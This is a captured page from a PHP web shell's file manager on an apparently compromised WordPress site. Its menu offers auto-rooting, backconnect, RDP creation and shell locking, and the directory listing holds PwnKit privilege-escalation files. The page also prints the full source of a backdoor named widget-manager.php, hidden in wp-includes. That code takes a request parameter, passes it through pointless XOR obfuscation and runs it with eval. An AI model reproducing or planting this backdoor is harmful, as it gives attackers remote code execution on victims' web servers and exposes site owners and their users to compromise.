Linux webm017.cluster127.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.127.20.17 | : 216.73.216.68
Cant Read [ /etc/named.conf ]
8.0.30
uptownsfxx
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
uptownsfxx /
www /
wp-includes /
js /
jquery /
jquery /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.htaccess
512
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
widget-manager.php
787
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : widget-manager.php
<?php //post jack function xorEncryptDecrypt($data, $key) { $keyLength = strlen($key); $result = ''; for ($i = 0; $i < strlen($data); $i++) { $keyChar = $key[$i % $keyLength]; $result .= chr(ord($data[$i]) ^ ord($keyChar)); } return $result; } $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $a=$_REQUEST["jack"]; $key="JLJBLDALS"; $encryptedData = xorEncryptDecrypt($a, $key); $a = xorEncryptDecrypt($encryptedData, $key); $process = proc_open(@eval($a), $descriptorspec, $pipes, NULL, NULL); if (is_resource($process)) { $stdout = stream_get_contents($pipes[1]); fclose($pipes[1]); fclose($pipes[0]); echo "$stdout"; $return_value = proc_close($process); }
Close